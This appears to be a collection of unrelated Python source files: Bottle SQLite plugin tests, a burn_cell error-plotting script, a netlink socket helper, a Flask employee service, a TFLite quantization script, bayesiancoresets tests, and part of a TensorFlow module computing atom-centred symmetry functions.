self._request('/')
def test_without_keyword(self):
@self.app.get('/')
def test_1():
pass
self._request('/')
@self.app.get('/2')
def test_2(**kw):
self.assertFalse('db' in kw)
self._request('/2')
def test_install_conflicts(self):
self.app.install(sqlite.Plugin(keyword='db2'))
@self.app.get('/')
def test(db, db2):
pass
# Two plugins installed under different keywords work side by side
self._request('/')
def test_text_factory(self):
# set text factory to str; unicode (the default) would cause a
# ProgrammingError: "You must not use 8-bit bytestrings" exception
self.app.install(sqlite.Plugin(keyword='db2',text_factory=str))
@self.app.get('/')
def test(db, db2):
char = 'ööö'
db2.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
db2.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
count = len(db2.execute("SELECT * FROM todo").fetchall())
self.assertEqual(count, 1)
self._request('/')
def test_text_factory_fail(self):
self.app.install(sqlite.Plugin(keyword='db3',text_factory=unicode))
@self.app.get('/')
def test(db, db3):
char = 'ööö'
db3.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
try:
db3.execute("INSERT INTO todo (id,task) VALUES ('1',:TEST)", { "TEST": char })
except sqlite3.ProgrammingError as e:
pass
self._request('/')
def test_user_functions(self):
class SumSq:
def __init__(self):
self.result = 0
def step(self, value):
if value:
self.result += value**2
def finalize(self):
return self.result
def collate_reverse(string1, string2):
if string1 == string2:
return 0
elif string1 < string2:
return 1
else:
return -1
testfunc1 = lambda: 'test'
testfunc2 = lambda x: x + 1
self.app.install(sqlite.Plugin(
keyword='db4',
functions={'testfunc1': (0, testfunc1), 'testfunc2': (1, testfunc2)},
aggregates={'sumsq': (1, SumSq)},
collations={'reverse': collate_reverse},
))
@self.app.get('/')
def test(db, db4):
db4.execute("CREATE TABLE todo (id INTEGER PRIMARY KEY, task char(100) NOT NULL)")
result = db4.execute("SELECT testfunc1(), testfunc2(2)").fetchone()
self.assertEqual(tuple(result), ('test', 3))
db4.execute("INSERT INTO todo VALUES (10, 'a')")
db4.execute("INSERT INTO todo VALUES (11, 'a')")
db4.execute("INSERT INTO todo VALUES (12, 'a')")
result = db4.execute("SELECT sumsq(id) FROM todo WHERE task='a'").fetchone()
self.assertEqual(tuple(result), (365,))
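# (sumsq over ids 10, 11 and 12 is 100 + 121 + 144 = 365.)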
result = db4.execute("SELECT ('a' < 'b' COLLATE reverse)").fetchone()
self.assertEqual(tuple(result), (0,))
self._request('/')
def test_raise_sqlite_integrity_error(self):
@self.app.get('/')
def test(db):
# task can not be null, raise an IntegrityError
db.execute("INSERT INTO todo (id) VALUES (1)")
# TODO: assert HTTPError 500
self._request('/')
self.assert_records(0)
def test_autocommit(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(1)
def test_not_autocommit(self):
@self.app.get('/', sqlite={'autocommit': False})
def test(db):
self._insert_into(db)
self._request('/')
self.assert_records(0)
def test_commit_on_redirect(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.redirect('/')
self._request('/')
self.assert_records(1)
def test_commit_on_abort(self):
@self.app.get('/')
def test(db):
self._insert_into(db)
bottle.abort()
self._request('/')
self.assert_records(0)
def _request(self, path, method='GET'):
return self.app({'PATH_INFO': path, 'REQUEST_METHOD': method},
lambda x, y: None)
def _insert_into(self, db):
sql = "INSERT INTO todo (task) VALUES ('PASS')"
db.execute(sql)
def assert_records(self, count):
cursor = self.conn.execute("SELECT COUNT(*) FROM todo")
self.assertEqual((count,), cursor.fetchone())
if __name__ == '__main__':
unittest.main()
|
python
|
# This code is designed to compare the absolute difference between one
# reference burn_cell test and multiple other burn_cell tests.
# burn_cell_testing.py must be run before running this.
# Around line 195, you choose which elements you will compare the xn and ydot of
# To change what you investigate, you must change what indices in
# short_spec_names you are iterating over
#
# This code is not designed to analyze the error between tests from two networks
#!/usr/bin/env python
from __future__ import print_function
import argparse
import glob
import numpy as np
from cycler import cycler
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument('runprefix', type=str,
help='Prefix of the output run files. We look for files named as [prefix]_[0-9]*')
parser.add_argument('--filenum', action='store_true', help='If --filenum, plot vs. file number')
parser.add_argument('--logtime', action='store_true', help='If --logtime, plot Log10(time).')
parser.add_argument('--tlo', type=float, help='Time lower limit')
parser.add_argument('--thi', type=float, help='Time upper limit')
parser.add_argument('--nlo', type=float, help='File num lower limit')
parser.add_argument('--nhi', type=float, help='File num upper limit')
args = parser.parse_args()
# Initializing variables and loading in data
print('Initializing')
runprefix = args.runprefix
file_testprefixes = open('{}_testprefixes.txt'.format(runprefix), 'r')
testprefixes = []
for line in file_testprefixes:
testprefixes.append('{}'.format(line.strip()))
file_testprefixes.close()
file_specs = open('{}_{}_short_spec_names.txt'.format(runprefix, testprefixes[0]), 'r')
short_spec_names = []
for line in file_specs:
short_spec_names.append(line.strip())
file_specs.close()
nspec = len(short_spec_names)
inputs = []
for i in range(len(testprefixes)):
# i corresponds to the index of a test prefix
inputs.append([])
file_inputs = open('{}_{}_inputs.txt'.format(runprefix, testprefixes[i]))
for line in file_inputs:
inputs[i].append('{}'.format(line.strip()))
file_inputs.close()
# Init time, temp, ener, xn, ydot
xn = []
ydot = []
fnum = []
temp = []
dtime = []
time = []
ener = []
denerdt = []
for prefix in range(len(testprefixes)):
xn.append([])
ydot.append([])
for n in range(nspec):
xn[prefix].append(np.loadtxt('{}_{}_xn{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
ydot[prefix].append(np.loadtxt('{}_{}_ydot{}.txt'.format(args.runprefix, testprefixes[prefix], n)))
temp.append(np.loadtxt('{}_{}_temp.txt'.format(args.runprefix, testprefixes[prefix])))
ener.append(np.loadtxt('{}_{}_ener.txt'.format(args.runprefix, testprefixes[prefix])))
denerdt.append(np.loadtxt('{}_{}_denerdt.txt'.format(args.runprefix, testprefixes[prefix])))
dtime = np.loadtxt('{}_{}_dtime.txt'.format(args.runprefix, testprefixes[0]))
time = np.loadtxt('{}_{}_time.txt'.format(args.runprefix, testprefixes[0]))
fnum = np.loadtxt('{}_{}_fnum.txt'.format(args.runprefix, testprefixes[0]))
## Define RGBA to HEX
def rgba_to_hex(rgba):
r = int(rgba[0]*255.0)
g = int(rgba[1]*255.0)
b = int(rgba[2]*255.0)
return '#{:02X}{:02X}{:02X}'.format(r,g,b)
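# e.g. rgba_to_hex((1.0, 0.5, 0.0, 1.0)) -> '#FF7F00'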
## PLOTTING
# Figure out time axis limits
if args.tlo and args.thi:
ltlim = [args.tlo, args.thi]
elif args.tlo:
ltlim = [args.tlo, time[-1]]
elif args.thi:
ltlim = [time[0], args.thi]
else:
ltlim = [time[0], time[-1]]
if args.logtime:
time = np.log10(time)
ltlim = np.log10(ltlim)
# Number axis limits
if args.nlo and args.nhi:
fnlim = [args.nlo, args.nhi]
elif args.nlo:
fnlim = [args.nlo, fnum[-1]]
elif args.nhi:
fnlim = [fnum[0], args.nhi]
else:
fnlim = [fnum[0], fnum[-1]]
# Time or file number selection
if args.filenum or args.nlo or args.nhi:
plot_vs_fnum = True
xlabel = r'$\mathrm{Output \#}$'
xvec = fnum
xlim = fnlim
else:
xvec = time
xlim = ltlim
if args.logtime:
xlabel = r'$\mathrm{Log_{10}~Time~(s)}$'
else:
xlabel = r'$\mathrm{Time~(s)}$'
# Get set of colors to use for abundances
cm = plt.get_cmap('nipy_spectral')
clist = [cm(1.0*i/nspec) for i in range(nspec)]
hexclist = [rgba_to_hex(ci) for ci in clist]
# Initialize figures and axes for the future plots
plt.figure(1, figsize=(6,9))
ax = plt.subplot(211)
ax.set_prop_cycle(cycler('color', hexclist))
errx = plt.subplot(212)
errx.set_prop_cycle(cycler('color', hexclist))
plt.figure(2, figsize=(6,9))
ay = plt.subplot(211)
ay.set_prop_cycle(cycler('color', hexclist))
erry = plt.subplot(212)
erry.set_prop_cycle(cycler('color', hexclist))
plt.figure(3, figsize=(5,9))
aT = plt.subplot(211)
errT = plt.subplot(212)
plt.figure(4, figsize=(5,9))
ae = plt.subplot(211)
erre = plt.subplot(212)
# Initialize arrays to contain values for plotting
diffx = []
diffydot = []
difftemp = []
diffdenerdt = []
line_styles = ['solid', 'dashed', 'dotted', 'dashdot']
# Plotting the reference data
print('Plotting the reference data from: {}'.format(testprefixes[0]))
for x in range(len(short_spec_names)):
# x corresponds to each molecule in the list of species
plt.figure(1)
ax.semilogy(xvec, xn[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(2)
ay.semilogy(xvec, ydot[0][x], label='{}-{}'.format(short_spec_names[x], testprefixes[0]), linestyle = line_styles[0])
plt.figure(3)
aT.semilogy(xvec, temp[0], label=testprefixes[0], linestyle = line_styles[0])
plt.figure(4)
ae.semilogy(xvec, denerdt[0], label=testprefixes[0], linestyle = line_styles[0])
# Plotting the data compared to reference and the error
for i in range(1, len(testprefixes)):
# In this context i corresponds to a test prefix to be compared
# to the data from a chosen data set
print('Plotting data from: {}'.format(testprefixes[i]))
difftemp.append([])
diffdenerdt.append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
difftemp[i-1].append(abs(temp[0][n] - temp[i][n]))
diffdenerdt[i-1].append(abs(denerdt[0][n] - denerdt[i][n]))
plt.figure(3)
# Uncomment the following line and the commented ae, ax, and ay
# to add additional graphs to the top graph in the output files
#aT.semilogy(xvec, temp[i], label=testprefixes[i], linestyle = line_styles[i])
errT.semilogy(xvec, difftemp[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
plt.figure(4)
#ae.semilogy(xvec, denerdt[i], label=testprefixes[i], linestyle = line_styles[i])
erre.semilogy(xvec, diffdenerdt[i-1], label=testprefixes[i], linestyle = line_styles[i-1])
diffx.append([])
diffydot.append([])
# This is where you decide which elements to investigate the xn and ydot of
for x in range(nspec):
# x is for each species involved
diffx[i-1].append([])
diffydot[i-1].append([])
for n in range(len(xvec)):
# n is for every time step from 0 to tmax
diffx[i-1][x].append(abs(xn[0][x][n] - xn[i][x][n]))
diffydot[i-1][x].append(abs(ydot[0][x][n] - ydot[i][x][n]))
plt.figure(1)
#ax.semilogy(xvec, xn[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
errx.semilogy(xvec, diffx[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
plt.figure(2)
#ay.semilogy(xvec, ydot[i][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i])
erry.plot(xvec, diffydot[i-1][x], label='{}-{}'.format(short_spec_names[x], testprefixes[i]), linestyle = line_styles[i-1])
# Mass Fraction Figure
print('Compiling Mass Fraction graph.')
plt.figure(1)
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ax.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ax.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ax.transAxes)
ax.set_xlabel(xlabel, fontsize=10)
ax.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
ax.set_title('Mass Fraction')
ax.set_xlim(xlim)
ax.tick_params(axis='both', which='both', labelsize=5)
box = errx.get_position()
errx.set_position([box.x0, box.y0, box.width * 0.8, box.height])
errx.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
errx.set_xlabel(xlabel, fontsize=10)
errx.set_ylabel('$\\mathrm{Log_{10} X}$', fontsize=10)
errx.set_title('Absolute Errors in Mass Fraction', fontsize=15)
errx.set_xlim(xlim)
errx.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_xn_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Molar Fractions
print('Compiling Molar Fraction graph.')
plt.figure(2)
box = ay.get_position()
ay.set_position([box.x0, box.y0, box.width * 0.8, box.height])
ay.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
ay.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ay.transAxes)
ay.set_xlabel(xlabel, fontsize=10)
ay.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
ay.set_title('Molar Fraction')
ay.set_xlim(xlim)
ay.tick_params(axis='both', which='both', labelsize=5)
box = erry.get_position()
erry.set_position([box.x0, box.y0, box.width * 0.8, box.height])
erry.legend(loc='upper left', bbox_to_anchor=(1,1), fontsize = 5)
erry.set_xlabel(xlabel, fontsize=10)
erry.set_ylabel('$\\mathrm{Log_{10} \\dot{Y}}$', fontsize=10)
erry.set_title('Absolute Errors in Molar Fraction', fontsize=15)
erry.set_xlim(xlim)
erry.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_y_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Temperature Figure
print('Compiling Temperature graph.')
plt.figure(3)
aT.legend(loc='upper left', fontsize = 5)
aT.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=aT.transAxes)
aT.set_xlabel(xlabel, fontsize=10)
aT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
aT.set_title('Temperature')
aT.set_xlim(xlim)
aT.tick_params(axis='both', which='both', labelsize=5)
errT.legend(loc='upper left', fontsize = 5)
errT.set_prop_cycle(cycler('color', hexclist))
errT.set_xlabel(xlabel, fontsize=10)
errT.set_ylabel('$\\mathrm{Log_{10} T~(K)}$', fontsize=10)
errT.set_title('Absolute Error in Temperature', fontsize=15)
errT.set_xlim(xlim)
errT.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_T_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
# Energy Generation Rate
print('Compiling Energy Generation Rate graph.')
plt.figure(4)
ae.legend(loc='upper left', fontsize = 5)
ae.text(0.005, 0.005, '{} {}'.format(inputs[0][30], inputs[0][31]), fontsize=5, transform=ae.transAxes)
ae.set_prop_cycle(cycler('color', hexclist))
ae.set_xlabel(xlabel, fontsize=10)
ae.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
ae.set_title('Energy Generation Rate')
ae.set_xlim(xlim)
ae.tick_params(axis='both', which='both', labelsize=5)
erre.legend(loc='upper left', fontsize = 5)
erre.set_prop_cycle(cycler('color', hexclist))
erre.set_xlabel(xlabel, fontsize=10)
erre.set_ylabel('$\\mathrm{Log_{10} \\dot{e}~(erg/g/s)}$', fontsize=10)
erre.set_title('Absolute Error in Energy Generation Rate', fontsize=15)
erre.set_xlim(xlim)
erre.tick_params(axis='both', which='both', labelsize=5)
plt.savefig('{}_{}_edot_compare_abs.png'.format(runprefix, testprefixes[0]), dpi=700)
|
python
|
#!/usr/bin/python
import socket,os
import platform
""" NETLINK related stuff
Astrit Zhushi 2011, [email protected]
"""
NETLINK_CONNECTOR=11
NETLINK_ADD_MEMBERSHIP=1
def get_cn_idx_iwlagn():
uname = platform.uname()[2]
infile = open("/usr/src/linux-headers-%s/include/linux/connector.h"
%(uname), "r")
flag = False
for line in infile:
if line.find("CN_IDX_IWLAGN") == -1:
continue
line = line.strip().split()
CN_IDX_IWLAGN = eval(line[2])
flag = True
break
infile.close()
if flag:
return CN_IDX_IWLAGN
raise IOError("CN_IDX_IWLAGN not found in connector.h")
def get_iwlnl_socket() :
CN_IDX_IWLAGN = get_cn_idx_iwlagn()
s = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
pid = os.getpid()
s.bind((pid,CN_IDX_IWLAGN))
s.setsockopt(270, NETLINK_ADD_MEMBERSHIP, CN_IDX_IWLAGN)
return s
|
python
|
"""
Employee service.
"""
from department_app import db
from department_app.models.department import Department
from department_app.models.employee import Employee
def add_employee_service(forename, surname, birthdate, department_id, salary):
"""
Adds employee to db.
:param forename: employee first name
:param surname: employee Surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee(
forename=forename,
surname=surname,
birthdate=birthdate,
salary=salary,
department_id=department_id
)
db.session.add(employee)
db.session.commit()
def update_employee_service(employee_id, forename=None, surname=None, birthdate=None, salary=None, department_id=None):
"""
Updates employee into db.
:param employee_id: employee id
:param forename: employee first name
:param surname: employee Surname
:param birthdate: employee birthdate
:param salary: employee salary
:param department_id: employee department id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
if forename:
employee.forename = forename
if surname:
employee.surname = surname
if birthdate:
employee.birthdate = birthdate
if salary:
employee.salary = salary
if department_id:
employee.department_id = department_id
db.session.add(employee)
db.session.commit()
def get_employee_by_id_service(employee_id):
"""
Returns employee from db.
:param employee_id: employee id
:return: employee
"""
return Employee.query.filter_by(id=employee_id).first()
def get_by_birthdate_service(date_from, date_to):
"""
Returns all employees with birthdate in mentioned period from db.
:param date_from: start_date
:param date_to: end_date
:return: list of all employees with birthdate in mentioned period
"""
return Employee.query.filter(Employee.birthdate.between(date_from, date_to)).all()
def get_all_employees_service():
"""
Returns all employees from db.
:return: list of all employees
"""
return Employee.query.all()
def delete_employee_service(employee_id):
"""
Deletes employee in db.
:param employee_id: employee id
:return: None
"""
employee = Employee.query.get_or_404(employee_id)
db.session.delete(employee)
db.session.commit()
def employee_to_dict(employee_id):
"""
Returns employee dictionary representation.
:param employee_id: employee id
:return: employee dictionary representation
"""
employee = get_employee_by_id_service(employee_id)
return {
'id': employee.id,
'forename': employee.forename,
'surname': employee.surname,
'birthdate': employee.birthdate.strftime('%Y-%m-%d'),
'salary': employee.salary,
'department': Department.query.get_or_404(employee.department_id).name
}
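# Example return value (hypothetical data):
# {'id': 1, 'forename': 'Ada', 'surname': 'Lovelace', 'birthdate': '1990-05-17',
#  'salary': 2500, 'department': 'Research'}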
def get_all_employees_for_department(department_id):
"""
Returns all employees in the department from database.
:param department_id: department id
:return: list of all employees in the department
"""
return Employee.query.filter_by(department_id=department_id).all()
|
python
|
### tensorflow==2.3.1
import tensorflow as tf
import tensorflow_datasets as tfds
import numpy as np
def representative_dataset_gen_480x640():
for data in raw_test_data.take(10):
image = data['image'].numpy()
image = tf.image.resize(image, (480, 640))
image = image[np.newaxis,:,:,:]
image = image - 127.5
image = image * 0.007843
yield [image]
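# (Subtracting 127.5 and scaling by 0.007843 ~ 1/127.5 maps 8-bit pixel values to
# roughly [-1, 1], which is assumed to match the preprocessing the model was trained with.)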
raw_test_data, info = tfds.load(name="coco/2017", with_info=True, split="test", data_dir="~/TFDS", download=False)
# Integer Quantization - Input/Output=float32
height = 480
width = 640
converter = tf.lite.TFLiteConverter.from_saved_model('saved_model_nyu_{}x{}'.format(height, width))
converter.optimizations = [tf.lite.Optimize.DEFAULT]
converter.representative_dataset = representative_dataset_gen_480x640
tflite_model = converter.convert()
with open('dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width), 'wb') as w:
w.write(tflite_model)
print('Integer Quantization complete! - dense_depth_nyu_{}x{}_integer_quant.tflite'.format(height, width))
|
python
|
import bayesiancoresets as bc
import numpy as np
import warnings
warnings.filterwarnings('ignore', category=UserWarning) #tests will generate warnings (due to pathological data design for testing), just ignore them
np.seterr(all='raise')
np.set_printoptions(linewidth=500)
np.random.seed(100)
tol = 1e-9
def test_empty():
x = np.random.randn(0, 0)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones"
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_one():
x = np.random.randn(1, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones: "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
def test_many():
x = np.random.randn(10, 3)
fd = bc.FullDataset(x)
for m in [1, 10, 100]:
fd.run(m)
assert fd.error() < tol, "full wts failed: error not 0"
assert np.all(fd.weights() == np.ones(x.shape[0])), "full wts failed: weights not ones "+str(fd.weights())
#check reset
fd.reset()
assert fd.M == 0 and np.all(np.fabs(fd.weights()) == 0.) and np.fabs(fd.error() - np.sqrt((fd.snorm**2).sum())) < tol and not fd.reached_numeric_limit, "FullDataset failed: reset() did not properly reset"
|
python
|
# MIT License
#
# Copyright (c) 2018 Silvia Amabilino
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
This module contains an implementation of the symmetry functions used in the Parkhill paper https://arxiv.org/pdf/1711.06385.pdf.
This implementation is different. It works for both data sets where all the molecules are the same but in different configurations and
for datasets with all different molecules.
Note: it is all in single precision.
"""
import tensorflow as tf
import numpy as np
def acsf_rad(xyzs, Zs, radial_cutoff, radial_rs, eta):
"""
This does the radial part of the symmetry function (G2 function in Behler's papers). It works only for datasets where
all samples are the same molecule but in different configurations.
:param xyzs: tf tensor of shape (n_samples, n_atoms, 3) containing the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param radial_cutoff: scalar tensor
:param radial_rs: tf tensor of shape (n_rs,) with the R_s values
:param eta: tf scalar
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
"""
# Calculating the distance matrix between the atoms of each sample
with tf.name_scope("Distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# Indices of terms that need to be zero (diagonal elements)
mask_0 = tf.zeros(tf.shape(dist_tensor))
mask_1 = tf.ones(tf.shape(Zs))
where_eq_idx = tf.cast(tf.matrix_set_diag(mask_0, mask_1), dtype=tf.bool)
# Calculating the exponential term
with tf.name_scope("Exponential_term"):
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(radial_rs, axis=0), axis=0), axis=0) # (1, 1, 1, n_rs)
expanded_dist = tf.expand_dims(dist_tensor, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
exponent = - eta * tf.square(tf.subtract(expanded_dist, expanded_rs))
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_rs)
# Calculating the fc terms
with tf.name_scope("fc_term"):
# Finding where the distances are less than the cutoff
where_less_cutoff = tf.less(dist_tensor, radial_cutoff)
# Calculating all of the fc function terms
fc = 0.5 * (tf.cos(3.14159265359 * dist_tensor / radial_cutoff) + 1.0)
# Setting to zero the terms where the distance is larger than the cutoff
zeros = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc, zeros) # (n_samples, n_atoms, n_atoms)
# Cleaning up diagonal terms
clean_fc_term = tf.where(where_eq_idx, zeros, cut_off_fc)
# Cleaning up dummy atoms terms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
cleaner_fc_term = tf.where(dummy_mask, clean_fc_term, zeros)
# Multiplying exponential and fc terms
expanded_fc = tf.expand_dims(cleaner_fc_term, axis=-1) # (n_samples, n_atoms, n_atoms, 1)
with tf.name_scope("Rad_term"):
presum_term = tf.multiply(expanded_fc, exp_term) # (n_samples, n_atoms, n_atoms, n_rs)
return presum_term
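# A note on what acsf_rad returns (inferred from the shapes above): presum_term holds the
# per-pair quantity exp(-eta * (R_ij - R_s)**2) * fc(R_ij); summing it over axis=2 (the
# second atom index) would give Behler's G2 radial symmetry function per atom and per R_s.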
def acsf_ang(xyzs, Zs, angular_cutoff, angular_rs, theta_s, zeta, eta):
"""
This does the angular part of the symmetry function as mentioned here: https://arxiv.org/pdf/1711.06385.pdf
It only works for systems where all the samples are the same molecule but in different configurations.
:param xyzs: tf tensor of shape (n_samples, n_atoms, 3) contaning the coordinates of each atom in each data sample
:param Zs: tf tensor of shape (n_samples, n_atoms) containing the atomic number of each atom in each data sample
:param angular_cutoff: scalar tensor
:param angular_rs: tf tensor of shape (n_ang_rs,) with the equivalent of the R_s values from the G2
:param theta_s: tf tensor of shape (n_thetas,)
:param zeta: tf tensor of shape (1,)
:param eta: tf tensor of shape (1,)
:return: tf tensor of shape (n_samples, n_atoms, n_atoms, n_atoms, n_ang_rs * n_thetas)
"""
# Finding the R_ij + R_ik term
with tf.name_scope("Sum_distances"):
dxyzs = tf.expand_dims(xyzs, axis=2) - tf.expand_dims(xyzs, axis=1)
dist_tensor = tf.cast(tf.norm(dxyzs, axis=3), dtype=tf.float32) # (n_samples, n_atoms, n_atoms)
# This is the tensor where element sum_dist_tensor[0,1,2,3] is the R_12 + R_13 in the 0th data sample
sum_dist_tensor = tf.expand_dims(dist_tensor, axis=3) + tf.expand_dims(dist_tensor,
axis=2) # (n_samples, n_atoms, n_atoms, n_atoms)
# Problem with the above tensor: we still have the R_ii + R_ik distances which are non zero and could be summed
# These need to be set to zero
n_atoms = Zs.get_shape().as_list()[1]
zarray = np.zeros((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
zarray[i, j, k] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(sum_dist_tensor)[0], 1, 1, 1])
        # zeros_1 is used further below, together with where_eq_idx, to zero out the terms with repeated indices
        zeros_1 = tf.zeros(tf.shape(sum_dist_tensor), dtype=tf.float32)
# Now finding the fc terms
with tf.name_scope("Fc_term"):
# 1. Find where Rij and Rik are < cutoff
where_less_cutoff = tf.less(dist_tensor, angular_cutoff)
# 2. Calculate the fc on the Rij and Rik tensors
fc_1 = 0.5 * (tf.cos(3.14159265359 * dist_tensor / angular_cutoff) + 1.0)
# 3. Apply the mask calculated in 1. to zero the values for where the distances are > than the cutoff
zeros_2 = tf.zeros(tf.shape(dist_tensor), dtype=tf.float32)
cut_off_fc = tf.where(where_less_cutoff, fc_1, zeros_2) # (n_samples, n_atoms, n_atoms)
# 4. Multiply the two tensors elementwise
fc_term = tf.multiply(tf.expand_dims(cut_off_fc, axis=3),
tf.expand_dims(cut_off_fc, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# 5. Cleaning up the terms that should be zero because there are equal indices
clean_fc_term = tf.where(where_eq_idx, zeros_1, fc_term)
# 6. Cleaning up the terms due to the dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1), tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_fc_term = tf.where(dummy_mask_3d, clean_fc_term, zeros_1)
# Now finding the theta_ijk term
with tf.name_scope("Theta"):
# Doing the dot products of all the possible vectors
dots_dxyzs = tf.cast(tf.reduce_sum(tf.multiply(tf.expand_dims(dxyzs, axis=3), tf.expand_dims(dxyzs, axis=2)),
axis=4), dtype=tf.float32) # (n_samples, n_atoms, n_atoms, n_atoms)
# Doing the products of the magnitudes
dist_prod = tf.multiply(tf.expand_dims(dist_tensor, axis=3),
tf.expand_dims(dist_tensor, axis=2)) # (n_samples, n_atoms, n_atoms, n_atoms)
# Dividing the dot products by the magnitudes to obtain cos theta
cos_theta = tf.divide(dots_dxyzs, dist_prod)
# Taking care of the values that due numerical error are just above 1.0 or below -1.0
cut_cos_theta = tf.clip_by_value(cos_theta, tf.constant(-1.0), tf.constant(1.0))
# Applying arc cos to find the theta value
theta = tf.acos(cut_cos_theta) # (n_samples, n_atoms, n_atoms, n_atoms)
# Removing the NaNs created by dividing by zero
clean_theta = tf.where(where_eq_idx, zeros_1, theta)
# cleaning up NaNs due by dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1),
tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
